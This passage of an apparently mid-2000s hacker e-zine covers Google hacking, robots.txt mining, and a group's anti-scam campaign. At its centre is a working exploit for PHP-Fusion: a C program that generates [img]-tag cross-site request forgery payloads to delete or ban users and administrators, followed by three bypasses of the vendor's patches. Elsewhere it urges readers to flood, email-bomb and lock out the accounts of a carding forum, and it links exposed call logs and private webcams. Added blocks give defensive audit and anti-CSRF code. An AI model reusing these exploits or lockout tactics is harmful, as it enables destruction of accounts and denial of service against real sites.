hamper your results on specific sites. if a page doesn't link to a page you are
looking for, google won't find it. programs like winhttrack will even look in
source to find pages, so for site-specific queries that might be another good if
not better option.

corporate responsibility
-------------------------
where does personal responsibility end and corporate responsibility start? many
people say google shouldn't allow users to search for exploited pages. there are
several problems with this proposal. first off, it would only become a race
between google and the exploiters. google is no more capable to block exploits
than people are to find and use them. there is a system in place called the
robots.txt file to help you if you are a super-paranoid admin. there was an
article in the most recent 2600 about getting out of google if you are a concerned
webmaster.

i personally don't believe that google has any responsibility. if people are
stupid enough to list their cmss in google and not be protected, it is their own
fault.
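
for admins on the other side of the intitle:"index of /" query and the robots.txt discussion above, here is an added example (not part of the original article): it goes through pages fetched from your own site, picks out auto-generated directory listings, and reports whether robots.txt keeps a compliant crawler away from each one. the site name, robots.txt, page bodies and function names are all constructed for illustration.

```python
"""Added example: audit your own site for directory listings and check
whether robots.txt keeps compliant crawlers away from them."""
import re
from urllib.robotparser import RobotFileParser

BASE = "http://www.example.test"  # hypothetical site being audited

# Constructed robots.txt and constructed crawl results (path -> html body).
ROBOTS_TXT = """\
User-agent: *
Disallow: /private/
"""
PAGES = {
    "/": "<html><head><title>welcome</title></head><body>hi</body></html>",
    # An ordinary page whose title merely starts with the same words.
    "/blog/": "<html><head><title>index of my posts</title></head></html>",
    "/files/": (
        "<html><head><title>Index of /files</title></head><body>"
        '<a href="?C=N;O=D">Name</a> <a href="/">Parent Directory</a> '
        '<a href="manual.pdf">manual.pdf</a> '
        '<a href="backup.zip">backup.zip</a></body></html>'
    ),
    "/private/": (
        "<html><head><title>Index of /private</title></head><body>"
        '<a href="/">Parent Directory</a> '
        '<a href="customers.csv">customers.csv</a></body></html>'
    ),
}

# Auto-generated listings carry a title of the form "Index of /<path>".
LISTING_TITLE = re.compile(r"<title>\s*index of\s*/", re.I)
# Entry links only: skip column-sort links (?C=...) and absolute paths
# such as the "Parent Directory" link.
ENTRY_HREF = re.compile(r'href="([^"?/][^"]*)"', re.I)


def listed_files(html):
    """Return the entries of a directory listing, or None for a normal page."""
    if not LISTING_TITLE.search(html):
        return None
    return ENTRY_HREF.findall(html)


def audit(pages, robots_txt, agent="Googlebot"):
    """Return (path, verdict, entries) for every directory listing found.

    verdict is "indexable" when a compliant crawler may fetch the listing,
    and "robots-only" when robots.txt is the only thing hiding it. The second
    case is still served to any client that ignores robots.txt.
    """
    robots = RobotFileParser()
    robots.parse(robots_txt.splitlines())
    findings = []
    for path in sorted(pages):
        entries = listed_files(pages[path])
        if entries is None:
            continue
        allowed = robots.can_fetch(agent, BASE + path)
        findings.append((path, "indexable" if allowed else "robots-only", entries))
    return findings


if __name__ == "__main__":
    for path, verdict, entries in audit(PAGES, ROBOTS_TXT):
        print(path, verdict, entries)
```

both verdicts call for the same fix, turning off automatic indexes or putting the directory behind authentication, because robots.txt only asks crawlers to stay away.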

conclusion
----------
google is a very powerful tool if used correctly. so much of hacking is based on
the finding of information and google mining can help you achieve just that. this
article does not cover all of google's features, it only covers ones that can go
in the search box. using services to find things has always been a skill a hacker
needs and google is just another service like many others before us. from using
the list command in irc to the inurl: command in google, information is always the
goal. if you have any questions, comments, or clarifications please feel free to
email me at sheepbyte@gmail.com

===============
= antidote =
= update =
===============
please welcome anonymous, anonymous, anonymous, anonymous, anonymous, anonymous,
anonymous, anonymous, and anonymous to the antidote!
we apologize for not revealing member names but as you know, this is sensitive
business.
check out our new site at:
antidote.kazasena.com
if you are a member of the lad wrecking crew or you know how to get in contact
with them please contact us!
we had a member join by the name of phatal. he hangs out on irc at
irc.undergroundnews.com
beware! phatal is a fed! shortly after he joined one of our members couldn't
remember us or what we had done, he left, and never came back. in other words,
arrested.
i would advise everybody to stay away from him. we had lots of weird activity
since his joining. stay away. stay safe.

there has been lots going on in the antidote labs. we have our own members only
irc channel now. there are several project updates you should hear. the ~blindnet
project is being discontinued until further notice however, we will finish it. the
spyice project is still very active as well as the anti-phishing project phishice.
we have sent tons of victim and scammer information to the authorities.
if you would like to contribute to the project please load the current super-leech
page against mega-buck.com a fake lottery site. we are now doing penetration
testing on a server near you! organizations, people we like, and special requests
may get a free or discounted rate. the standard rate for a test is 100 u.s. if we
don't find any vulnerabilities you pay n-o-t-h-i-n-g! email sheepbyte@gmail.com
for more information or catch him at the tiz irc channel.

looks like the swiftcashexpress got some more publicity:
http://forums.ebay.de/thread.jspa?threadid=200155900&tstart=160&mod=1120667583832

and it made it in the fucking zone-h defacement archive:
http://www.zone-h.org/en/defacements/view/id=2532512/
they didn't get the most recent version but it is still in there.

we leeched all the bandwidth from mega-buck.com. another fake lottery bites the
dust.

we are trying to kill carding.ru
this site is a forum where people buy and sell paypal, ebay, egold, credit cards,
and other financial accounts. please leech and spam this site dead. reload the
homepage or contact the owners. emails you can bomb:
info@mazafaka.ru

you can log in to these admin accounts with bad passwords to lock them out:
administration
render

you can lock out the members also. there is a memberlist here:
http://antidote.kazasena.com/memberlist.txt

report the scammers accounts:
webmoney: z684458941535
e-gold : 2153723

the aa419.org flashmob is occurring or is already done by the time you read this
but we still need your help!
you can reload these fake banks pages. the targets are:

you can call the people who run these fake banks!!!
phone numbers:

you can fax them:



you can even sms them:


you can spam their emails:

if you wish to leech from an always updating large list of targets check out the
mugu marauder and the lad vampire at aa419.org. while the flashmob is occurring
it will only leech from these targets.
for those who are interested in joining the battle against scammers you should
check out 419eater.com 419sport.com thescambaiter.com aa419.org and if you are so
brave as to, join the antidote by emailing sheepbyte
thanks to everybody who has participated in this flashmob.
/exit
============================
= a new php-fusion exploit =
= found by easyex =
============================
quote:
two security flaws have recently been discovered in the ubb code parsing by two
of our users. grindordie found that a user could virtually deface areas of the
site that utilise the [color] tags. while this does not cause any harm it can be
rather annoying. easyex's discovery is quite a troublesome one, an attacker can
potentially delete items from your site using the [img] tags without anyone
knowing. as usual i have produced the required fixes. the sourceforge files have
been updated, existing users can download the new maincore.php file from the
downloads area. updated i've refined the code and updated the files. if you
prefer to update the code yourself click read more for instructions.

source: http://www.php-fusion.co.uk/

/*

dark assassins - http://dark-assassins.com/
visit us on irc @ irc.tddirc.net #darkassassins

php-fusion [img][/img] exploit
discovered/coded by easyex

using the [img] [/img] codes we can get an administrator to do a function a
normal member cannot do.

for example..

[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]

this could be in our signature, forum post or in a comment post. when an admin
views the page with the malicious code it will automatically load and do the
function we selected. in the example it would delete the member with the id: 1

because we are using the [img] [/img] code it just shows up as an invalid image.

code usage:

./fusionimg <version> <dir> deluser <start> <end>
./fusionimg <version> <dir> banuser <start> <end>
./fusionimg <version> <dir> delshout <start> <end>
./fusionimg <version> <dir> deladmin <start> <end>

<version> is the php-fusion version. enter 6.x or 5.x depending on the version
number.
<start> is the start point of user id(s)
<end> is the end point of the user id(s)

so if we had a vulnerable host running php fusion v6.00.106 or below with say
150 users and we wanted to delete them all we would type
./fusionimg 6.x / deluser 1 150 or if we wanted to delete 1 user that had the
id: 5 we would type: ./fusionimg 6.x / deluser 5 5

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int usage() {
    printf("usage: ./fusionimg <version> <dir> <option> <start> <end>\n");
    printf("example: ./fusionimg 6.x / deluser 1 500\n");
    exit(1);
}

int main (int argc, char *argv[]) {

    printf("\n");
    printf("php-fusion [img][/img] exploit\n");
    printf("coded by easyex from the dark assassins crew\n\n");

    if(argc < 6 )
        usage();

    int i;
    char cmd[512];
    char option[512];
    char version[512];
    FILE *log;
    log = fopen("exploit.txt", "w+");

    if(log == 0) {
        printf("[-] error opening log file.\n");
        exit(-1);
    }

    fprintf(log, "php-fusion [img][/img] exploit\n");
    fprintf(log, "discovered/coded by easyex\n\n");

    // the admin directory name depends on the php-fusion version
    if(strcmp(argv[1], "6.x") == 0) {
        strncpy(version, "administration/", 512);
    }
    else if(strcmp(argv[1], "5.x") == 0) {
        strncpy(version, "fusion_admin/", 512);
    }
    else {
        printf("[-] error, invalid version!\n");
        exit(-1);
    }

    // there are other options you can do, this is just some of them...

    // if you need to find out a users id you can just go to members.php and
    // click on the user you want and the id will show in the url like ?lookup=1

    if(strcmp(argv[3], "deluser") == 0) {
        strncpy(option, "members.php?step=delete&sortby=all&rowstart=0&user_id=", 512);
        fprintf(log, "you have selected to delete %s > %s user(s)\n", argv[4], argv[5]);
    }
    else if(strcmp(argv[3], "banuser") == 0) {
        strncpy(option, "members.php?step=ban&act=on&sortby=all&rowstart=0&user_id=", 512);
        fprintf(log, "you have selected to ban %s > %s user(s)\n", argv[4], argv[5]);
    }
    else if(strcmp(argv[3], "delshout") == 0) {
        strncpy(option, "shoutbox.php?action=delete&shout_id=", 512);
        fprintf(log, "you have selected to delete %s > %s shoutbox post(s)\n", argv[4], argv[5]);
    }
    // we can delete any account, but we cant add admin accounts
    else if(strcmp(argv[3], "deladmin") == 0) {
        strncpy(option, "administrators.php?remove=", 512);
        fprintf(log, "you have selected to delete %s > %s administator(s)\n", argv[4], argv[5]);
    }
    else {
        printf("[-] error, invalid option!\n");
        exit(-1);
    }

    printf("[+] generating image codes...\n\n");

    fprintf(log, "add the following lines of code into your signature, forum post or in a comment post:\n\n");

    for (i = atoi(argv[4]); i <= atoi(argv[5]); i++) {
        // snprintf so a long <dir> argument cannot overflow cmd[]
        snprintf(cmd, sizeof(cmd), "[img]%s%s%s%d[/img]", argv[2], version, option, i);
        fprintf(log, "%s\n", cmd);
    }

    printf("[+] completed & logged to exploit.txt\n");

    fclose(log);
    return 0;
}

php-fusion ubb code security patch bypass

vulnerable: php-fusion: 6.00.106

discovered by: easyex

old code:

code:

$ubbs1[10] = '#\[img\](.*?)\[/img\]#si';
$ubbs2[10] = '<img src=\'\1\' border=\'0\'>';

new code (patch):

code:

$ubbs1[10] = '#\[img\](.*?)(\.(jpg|jpeg|gif|png|jpg|jpeg|gif|png))\[/img\]#si';
$ubbs2[10] = '<img src=\'\1\2\' border=\'0\'>';

but, you can still exploit this latest security patch

old exploit example:

code:

[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1[/img]

so that was the first example, but now the patch is up we have to bypass that
also, we can do this by adding a .jpg extension:

new exploit example:

code:

[img]/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1&exploit=.jpg[/img]

you can add any image extension that is allowed and the php-fusion <= 6.0 106
bbcode img tag script injection exploit will now work with the latest security
patch.

to get it to work with the exploit code, if needed modify the following:

code:

sprintf(cmd, "[img]%s%s%s%d[/img]", argv[2], version, option, i);

to

code:

sprintf(cmd, "[img]%s%s%s%d&exploit=.jpg[/img]", argv[2], version, option, i);

and it will now create the correct image tags for the people who are running the
patch.

php-fusion has made the 2nd update to the ubb code security patch to fix the
&exploit=.jpg problem.

still exploitable. let's take a look at the latest ubb code security patch
code:

$ubbs1[10] = "#\[img\]((http|ftp|https|ftps)://)(.*?)(\.(jpg|jpeg|gif|png|jpg|jpeg|gif|png))\[/img\]#sie";
$ubbs2[10] = "'<img src=\'\\1'.str_replace(array('?','&','='),'','\\3').'\\4\'>'";

so now what it does is only allow http:// ftp:// etc in the [img] and it blocks ?
& = etc but we can get around this...

we can create a directory on a remote host called 'exploit.jpg' or what ever you
like, and then in the directory you would create index.php like the following
example:

code:

<?php
header("location: http://example.com/administration/members.php?step=delete&sortby=all&rowstart=0&user_id=1&exploit=.jpg");
exit;
?>

so it thinks it's an image file, but really it isn't and it executes the
index.php script and then the exploit works fine again, but this time you have to
include the host running php-fusion in that index.php script.

then, you go to the host running php-fusion and then again put it in your
signature, make a forum post, or comment post

example:

code:

[img]http://theremotehost.com/exploit.jpg[/img]

and all works fine once again.
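
why the three tag-filter patches above kept failing, and what closes the hole, as an added example (not php-fusion's code and not easyex's): the admin script changes state on a plain get request authenticated only by the session cookie, so the check belongs in the admin action, not in the [img] parser. the python below is a model of such a handler; `Session`, `handle_admin_action` and the form field name `token` are assumptions made for illustration.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit, parse_qs


@dataclass
class Session:
    """server-side session for a logged-in admin (hypothetical model)."""
    is_admin: bool = True
    # random per-session secret, embedded only in forms the site itself renders
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


def handle_admin_action(session, method, url, form=None):
    """return (http_status, reason) for a state-changing admin request.

    the browser attaches the session cookie to every request, including
    ones triggered by an <img> tag or a redirect, so the cookie alone
    proves nothing about what the admin intended.
    """
    form = form or {}
    if not session.is_admin:
        return 403, "not an administrator"
    # 1. never change state on get: image loads, and redirects the
    #    browser follows while loading an image, are always get
    if method.upper() != "POST":
        return 405, "state-changing action requires post"
    # 2. the token travels in the post body only, never in the url
    if "token" in parse_qs(urlsplit(url).query):
        return 400, "token must not be sent in the query string"
    supplied = form.get("token", "")
    # 3. constant-time comparison against the per-session secret
    if not hmac.compare_digest(supplied.encode(), session.csrf_token.encode()):
        return 403, "missing or wrong anti-csrf token"
    return 200, "action performed"


# constructed requests, shaped like what the admin's browser ends up
# sending for each of the three [img] variants described above
IMG_TRIGGERED = [
    "/administration/members.php?step=delete&user_id=1",
    "/administration/members.php?step=delete&user_id=1&exploit=.jpg",
    # third variant: the remote "image" answers with a redirect to this url
    "http://example.com/administration/members.php?step=delete&user_id=1&exploit=.jpg",
]


def replay_img_requests(session):
    """statuses the hardened handler returns for the image-triggered gets."""
    return [handle_admin_action(session, "GET", u)[0] for u in IMG_TRIGGERED]


def legitimate_delete(session):
    """the site's own admin form: post carrying the session's token."""
    return handle_admin_action(
        session, "POST", "/administration/members.php",
        form={"step": "delete", "user_id": "1", "token": session.csrf_token},
    )[0]


if __name__ == "__main__":
    s = Session()
    print("image-triggered:", replay_img_requests(s))
    print("admin form     :", legitimate_delete(s))
```

with this check in place the extension and scheme filters in the tag parser stop mattering: whatever url ends up in the src attribute, the request it produces cannot carry the token.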


==========================================
= scanning robot files with access diver =
==========================================
by: sheepbyte
i have been doing lots of robots.txt mining on sites and i thought, "there must
be a better way", and voila! there was.

purpose
-------
use access diver to automate the process of scanning robots.txt files

supplies needed
---------------
access diver
sample robots.txt file
a parsing program

mining robot files is fairly easy with the right tools. first what we will do is
take a robots.txt file.
access diver exploiter config files are formatted like this:
/urltoscan
root or local or fullurl
checked or unchecked
response code if any

input the robots file into this program:

here is a nice little robots.txt file stripper in c by stderr:

"
/*****************************************************
 * robots.c -- parse robots.txt file for urls.       *
 *                                                   *
 * author: stderr (stderr.dev@gmail.com)             *
 *****************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>

void usage(void)
{
    printf("./robots.txt <input file> <output file>\n");
}

int main(int argc, char *argv[])
{
    FILE *input_file;
    FILE *output_file;

    char line[256];
    char url[256];

    if (argc < 3) {
        usage();
        exit(1);
    }
    printf("[+] robots parsing program\n");
    printf("[+] written by stderr.\n");
    printf("############################\n");
    input_file = fopen(argv[1],"r");
    if (input_file == 0) {
        printf("error opening file.\n");
        exit(1);
    }
    output_file = fopen(argv[2],"w");
    if (output_file == 0) {
        printf("error opening file.\n");
        exit(1);
    }

    printf("[+] parsing %s\n",argv[1]);

    /* only the first character is lowercased, so "Disallow:" and "Allow:"
       match; the %255s width keeps url[] from overflowing */
    while (fgets(line,sizeof(line),input_file) != NULL) {
        line[0] = tolower((unsigned char)line[0]);
        if (sscanf(line,"disallow: %255s", url) > 0) {
            fprintf(output_file,"%s\nlocal\n",url);
        }
        else if (sscanf(line,"allow: %255s", url) > 0) {
            fprintf(output_file,"%s\nlocal\n",url);
        }
    }
    printf("[+] results written to %s\n",argv[2]);

    fclose(input_file);
    fclose(output_file);
    return 0;
}

"

once you have done this, save the output to robots1.ini in a directory you will
remember. now, open access diver and go to the exploiter tab. click on the folder
icon and load the ini file. type the url where you got the robots file (like
http://whitehouse.gov) and it will scan all the urls for you. special thanks to
stderr for his help on this.
this would be good for sites with long robots files like whitehouse.gov and
epa.gov
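
the same parsing turned around for the admin who owns the site, as an added example (not stderr's code and not part of the original article): robots.txt is a public, advisory file, so every disallow line is also a published list of paths you would rather nobody visited. the python below goes beyond robots.c by handling comments, mixed case and user-agent groups, and flags entries that look sensitive; the keyword list and the sample file are constructed assumptions.

```python
import re

# hypothetical keyword list; tune it to your own site
SENSITIVE = re.compile(
    r"(admin|backup|\.bak|\.sql|config|private|secret|passw|tmp|cgi-bin|\.git)",
    re.IGNORECASE,
)


def parse_robots(text):
    """yield (user_agent, directive, path) for each allow/disallow rule."""
    agents, last_was_agent = [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        key = key.lower()                        # field names are case-insensitive
        if key == "user-agent":
            # consecutive user-agent lines share one group of rules
            if not last_was_agent:
                agents = []
            agents.append(value)
            last_was_agent = True
            continue
        last_was_agent = False
        # an empty "disallow:" means "nothing is disallowed", so skip it
        if key in ("allow", "disallow") and value:
            for agent in agents or ["*"]:
                yield agent, key, value


def audit(text):
    """return sorted disallowed paths that advertise something sensitive."""
    findings = set()
    for _agent, directive, path in parse_robots(text):
        if directive == "disallow" and SENSITIVE.search(path):
            findings.add(path)
    return sorted(findings)


# constructed sample, not taken from any real site
SAMPLE = """\
# example robots.txt
User-agent: *
Disallow: /cgi-bin/
DISALLOW: /administration/   # cms admin panel
Disallow: /images/
Allow: /images/public/
Disallow:

User-agent: googlebot
User-agent: msnbot
Disallow: /backup/site-2005.sql
Disallow: /print/
"""

if __name__ == "__main__":
    for path in audit(SAMPLE):
        print("listed in robots.txt, needs real access control:", path)
```

anything this flags should be protected by authentication or moved out of the web root; keeping it out of robots.txt only removes the signpost.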

=================================
= bellsouth and government =
= doc droppage =
=================================
thanks to the careless management at pnn.gov.co you can see bellsouth call logs in
spanish for over 100 people. we figured we'd just give you the url instead of
wgeting it. if anybody has an archive of this site please contact us so we can
make it available:
http://www.pnn.gov.co/docs/pruebas/moviles/coexistencia/bellsouth/

===========================
= webcam update =
===========================
thanks to snags of digital-deception.net for submitting these:

http://195.243.185.195/view/indexframe.shtml
airport in stuttgart, germany
http://webcam.rockdetente.com/view/indexframe.shtml
didn't bother doing a reverse and arin to find out where this one is, but there's
a nice chick workin at this recording studio
http://webcam.lajollademismaloya.com/view/indexframe.shtml
a resort

send your webcams to sheepbyte@gmail.com!

=============================
= spread lynn-cisco project =
=============================
the idea that people can't spread the lynn document on the cisco vuln is bullshit.
although cisco has been hacked, we believe more drastic action needs to be taken.
we will be maintaining a list of mirrors for this file much like 2600 listed decss
mirrors. if you have a mirror set up email us a link. this is an effort to bypass
and stop censorship. please join us in the effort. current mirrors:

http://sr2.mytempdir.com/110387
http://rapidshare.de/files/3794495/lynn-cisco.pdf.html
http://www.jwdt.com/~paysan/lynn-cisco.pdf
http://www.warbard.ca/temp/lynn-cisco.pdf
http://www.viruswatch.nl/info/lynn-cisco.pdf
http://www.security.nnov.ru/files/lynn-cisco.pdf

===========================
= the realist's manifesto =
===========================
when i first saw this in "weapons of mass delusion" by richard forno i just had to
include it:
"i call myself a realist and this is my manifesto:
i am a realist. i live my life based on reality, not wishful
thinking, hyperbole, spin, empty promises, fear mongering,
or adherence to a single party platform. i will not subscribe to
a single party line, and most importantly, i pride myself on
routinely doing a very contemporary un-american thing by
thinking for myself and forming my own opinions on the issues
impacting on my life and nation."

i think this is a very important quote because it teaches us to think, speak, and
act as ourselves and not to conform to the prejudiced, biased, and corporate
driven views that are forced upon us by gluttonous, rich, and stuck-up american
politicians and businesses. this is not the entire manifesto but just the
introduction. i suggest you get the book to read it. the manifesto is in the
beginning of the first chapter and is pages long. you can get the book online for
free at the official website infowarrior.org

===============
= mail.b0x =
===============

i finally got a reply from yahoo geocities abuse. i listed the email that i sent
before but i'll show it again in case you forgot.
======================
my email:
"dear geocities hosting,
you are hosting the site kenexfinances.com
this site is operating fraudulently and pretending to be an
online bank. there are many ways to tell this bank is fake.
the bank is not listed with any of the proper banking
authorities which it needs to be and there is no reference
of it on the web. the phone numbers listed resolve to
satellite phones and not actual phone lines. the site makes
outright lies about the operation of its business. the web
design is poor. this site has stolen graphics from other
sites along with text and superimposes its name on them. the
site insecurely stores member information which is directly
in the source of the web page. this site is listed with
aa419.org which is an anti 419 scam organization which works
very closely with many government bodies including the south
african police services website located at 419legal.org
the entry for this bank may be found at:
http://aa419.org/fake-banks/fakebanksview.php?key=4224

we request that you shut down this site immediately and save
a back-up of the data for federal authorities which may be
investigating this site. refusal or neglect to shut down
this site is a federal crime and you could be charged with
knowingly allowing criminal activities to occur on your
server.
please reply."

(they are yet to reply to the other message)

their reply:
"hello,

thank you for contacting yahoo! customer care.

thank you for informing us of possible abuse on yahoo! geocities. we
have investigated the site and taken the necessary action. please
continue to notify us of any content you believe violates the geocities
terms of service, located at:

http://docs.yahoo.com/info/terms/geoterms.html

thank you again for contacting yahoo! customer care.

regards,

yahoo! customer care"

this email came about a month after they shut down the site but at least they got
around to it.
=========================

got a reply from the "recover my accounts" guy who had like 10 "accounts" that got
hacked.
"hey. what if i get some one in russia to help me hack and get my accounts back??
will police catch me? in russia people hack casinos websites , usa and ntto
military bases u would know u are a hacker urself and easy get away with that . so
if i get some one from there to help me will i get in trouble by any chance?"

reply:
"dear i.r.m.,
i sincerely don't believe these are your accounts. it is most likely the police
won't catch you soon. the only way they would catch you is if they caught the
russian hacker but it will catch up to you in the future. maybe you should give up
your petty dreams with this stupid online game and move on. it is true that those
hackers get into us computer systems such as military and government computers but
most of them get caught. it isn't easy to get away from such a crime because the
us government has unlimited resources and you have your check from the bank. you
will probably not get in trouble but bad people get their "up 'n comings".

lataz,
sheepbyte@tiz"

send articles, questions, comments, concerns, flames, rants, announcements, and
other zine related info to sheepbyte@gmail.com. for matters dealing with an
individual article please contact sheepbyte@gmail.com or the member who wrote it.
remember: tiz is best viewed in courier size 10 with a resolution of 800x600 or
greater in a text editor.

shouts to
----------
34019 of pandora-security
xplicit pwned by his dsl and nickserv
?hate remix-radio
nunez is never on irc... wtf?
thefailure you know why *wink*
dexlyisc his freezer exploded. hahahahahahahahah!
phatal take your trash elsewhere fucker. ouch! slammed in a zine.
gizmo stop hovering. that was between me and him, stay out of it.
kazm thanks for all the help on the hacker torrents and the hosting!
the lwc thanks for the inspiration (lad wrecking crew)

"real patriots don't ask questions, and normal people don't
challenge the status quo at least that's what we're led to
believe, especially after september 2001. besides, we're too
busy trying to live up to the promises and visions of being
free that we just don't have the time or inclination to worry
about such things. real patriots just do what they're told. so
do sheep." - richard forno's weapons of mass delusion

if that's too political for you:


"
<nes> lol
<nes> i download something from napster
<nes> and the same guy i downloaded it from starts downloading it from me when i'm done
<nes> i message him and say "what are you doing? i just got that from you"
<nes> "getting my song back fucker"
"
{tiz}
[end of file]
